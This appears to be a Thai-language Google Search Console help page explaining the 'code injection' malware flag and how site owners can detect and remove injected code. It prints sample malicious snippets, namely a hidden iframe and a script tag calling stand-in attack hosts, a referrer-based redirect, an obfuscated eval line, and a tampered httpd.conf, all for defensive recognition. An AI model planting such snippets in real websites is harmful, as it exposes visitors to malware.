ประเภทการติดมัลแวร์: การแทรกโค้ด

หน้าที่ถูกทำเครื่องหมายด้วยการติดมัลแวร์ประเภท "การแทรกโค้ด" ใน Google Search Console หมายความว่าอย่างไร

เครื่องหมายนี้หมายความว่าหน้าต่างๆ บนเว็บไซต์ของคุณได้รับการแก้ไขให้มีโค้ดที่เป็นอันตราย เช่น iframe ไปยังเว็บไซต์โจมตีมัลแวร์

สำหรับข้อมูลคร่าวๆ เกี่ยวกับมัลแวร์ โปรดดูประเมินความเสียหาย (ถูกแฮ็กด้วยมัลแวร์)

ฉันจะตรวจสอบมัลแวร์ประเภท "การแทรกโค้ด" ได้อย่างไร

ก่อนอื่น ให้หลีกเลี่ยงการใช้เบราว์เซอร์เพื่อดูหน้าที่ติดมัลแวร์บนเว็บไซต์ของคุณ เนื่องจากมัลแวร์มักจะแพร่กระจายโดยใช้ช่องโหว่จากเบราว์เซอร์ การเปิดหน้าเว็บที่ติดมัลแวร์ในเบราว์เซอร์อาจทำให้คอมพิวเตอร์ของคุณเสียหายได้

ลองยืนยันลักษณะการทำงานดังกล่าวโดยใช้ cURL หรือ Wget เพื่อส่งคำขอ HTTP (ตัวอย่างเช่น ขอดึงข้อมูลหน้าเว็บ) เครื่องมือที่มีให้ใช้งานฟรีเหล่านี้จะใช้ในการวิเคราะห์การเปลี่ยนเส้นทาง รวมทั้งให้ความยืดหยุ่นในการรวมข้อมูลผู้อ้างอิงหรือ user-agent การแสดงเฉพาะเนื้อหาที่เป็นอันตรายต่อผู้ใช้โดยใช้ user-agent หรือผู้อ้างอิงที่เฉพาะเจาะจงทำให้แฮกเกอร์สามารถกำหนดเป้าหมายไปยัง "ผู้ที่มีตัวตนอยู่จริง" มากขึ้น และสามารถหลีกเลี่ยงการตรวจจับจากเจ้าของเว็บไซต์และโปรแกรมสแกนมัลแวร์ได้ดียิ่งขึ้น (เว็บไซต์ของคุณจะต้องออนไลน์เพื่อใช้เครื่องมือเหล่านี้)

ตัวอย่างเช่น

$curl -v --referer <referer-field> --user-agent "Mozilla/5.0 (
  Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.30 (KHTML, like Gecko) 
  Chrome/12.0.742.112 Safari/534.30" <your-url>
เช่น
$curl -v --referer "http://www.google.com" --user-agent "Mozilla/5.0 
  (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.30 (KHTML, like Gecko) 
  Chrome/12.0.742.112 Safari/534.30" http://www.example.com/page.html

ต่อไปให้ลงชื่อเข้าสู่ระบบไฟล์ ตรวจสอบทรัพยากรทั้งหมดที่เขียนลงใน URL "การแทรกโค้ด" ที่ติดมัลแวร์ ตัวอย่างบางส่วนของการแทรกโค้ดที่เป็นอันตรายมีดังต่อไปนี้

  • iframe ไปยังเว็บไซต์โจมตี
  • <iframe frameborder="0" height="0" src="http://<attack-site>/path/file" 
      style="display:none" width="0"></iframe>
  • JavaScript หรือภาษาสคริปต์อื่นที่เรียกใช้สคริปต์จากเว็บไซต์โจมตี
  • <script type='text/javascript' src='http://malware-attack-site/js/x55.js'></script>
  • สคริปต์ที่เปลี่ยนเส้นทางเบราว์เซอร์ไปยังเว็บไซต์โจมตี
  • <script>
      if (document.referrer.match(/google\.com/)) {
        window.location("http://malware-attack-site/");
      }
    </script>
  • โค้ดที่เป็นอันตรายที่ถูกทำให้สับสนเพื่อหลีกเลี่ยงการตรวจพบ
  • eval(base64_decode("aWYoZnVuaauUl+hasdqetiDi2iOwlOHTgs+slgsfUNlsgasdf"));
  • ไฟล์ออบเจ็กต์ที่แชร์ออกแบบมาเพื่อสุ่มเขียนโค้ดที่เป็นอันตรายลงในสคริปต์ที่เพิ่มขึ้นมา
  • #httpd.conf modified by the hacker
    LoadModule harmful_module modules/mod_harmful.so
    AddModule mod_harmful.c

ตรวจสอบโค้ดซึ่งอาจเป็นอันตรายที่อยู่บนเว็บไซต์ทั้งหมด โดยอาจค้นหาคำว่า [iframe] เพื่อค้นหาโค้ด iframe คำหลักที่เป็นประโยชน์อื่นๆ คือ "script", "eval" และ "unescape" ตัวอย่างเช่นในระบบยูนิกซ์ ให้ใช้คำสั่งต่อไปนี้

$grep -irn "iframe" ./ | less

ฉันจะทำความสะอาดเว็บไซต์ของฉันจากมัลแวร์ประเภท "การแทรกโค้ด" ได้อย่างไร

เมื่อพร้อมที่จะทำความสะอาดเว็บไซต์ของคุณ (ขั้นตอนที่ 7 ในความช่วยเหลือเกี่ยวกับการกู้คืนเว็บไซต์ที่ถูกแฮ็ก) คุณสามารถแทนที่ไฟล์ที่ติดมัลแวร์ด้วยข้อมูลสำรองที่ใช้งานได้ล่าสุด หรือนำการแทรกโค้ดออกจากแต่ละหน้าเว็บ รวมถึงฟังก์ชันสคริปต์และไฟล์ที่เกี่ยวข้องทั้งหมด ถ้าคุณแก้ไขไฟล์การกำหนดค่าของเซิร์ฟเวอร์ คุณอาจจำเป็นต้องเปิดเว็บเซิร์ฟเวอร์ของคุณใหม่เพื่อให้การเปลี่ยนแปลงมีผล

โปรดทราบว่าการนำโค้ดที่เป็นอันตรายออกไม่ได้แก้ไขช่องโหว่ที่มีอยู่ที่ทำให้แฮกเกอร์สามารถแฮ็กเว็บไซต์ของคุณ หากคุณไม่แก้ไขปัญหาที่เป็นต้นเหตุ เว็บไซต์ของคุณอาจถูกโจมตีอีกในอนาคต สำหรับข้อมูลเพิ่มเติมเกี่ยวกับการทำความสะอาดทั้งเว็บไซต์ของคุณ ไม่ใช่เพียงแค่มัลแวร์ประเภทนี้เท่านั้น โปรดดูความช่วยเหลือสำหรับเว็บไซต์ที่ถูกแฮ็ก โดยเฉพาะในเรื่อง "การประเมินความเสียหายของระบบไฟล์" ในขั้นตอนที่ 5: ประเมินความเสียหาย (ถูกแฮ็กด้วยมัลแวร์)

ข้อมูลนี้มีประโยชน์ไหม
เราจะปรับปรุงได้อย่างไร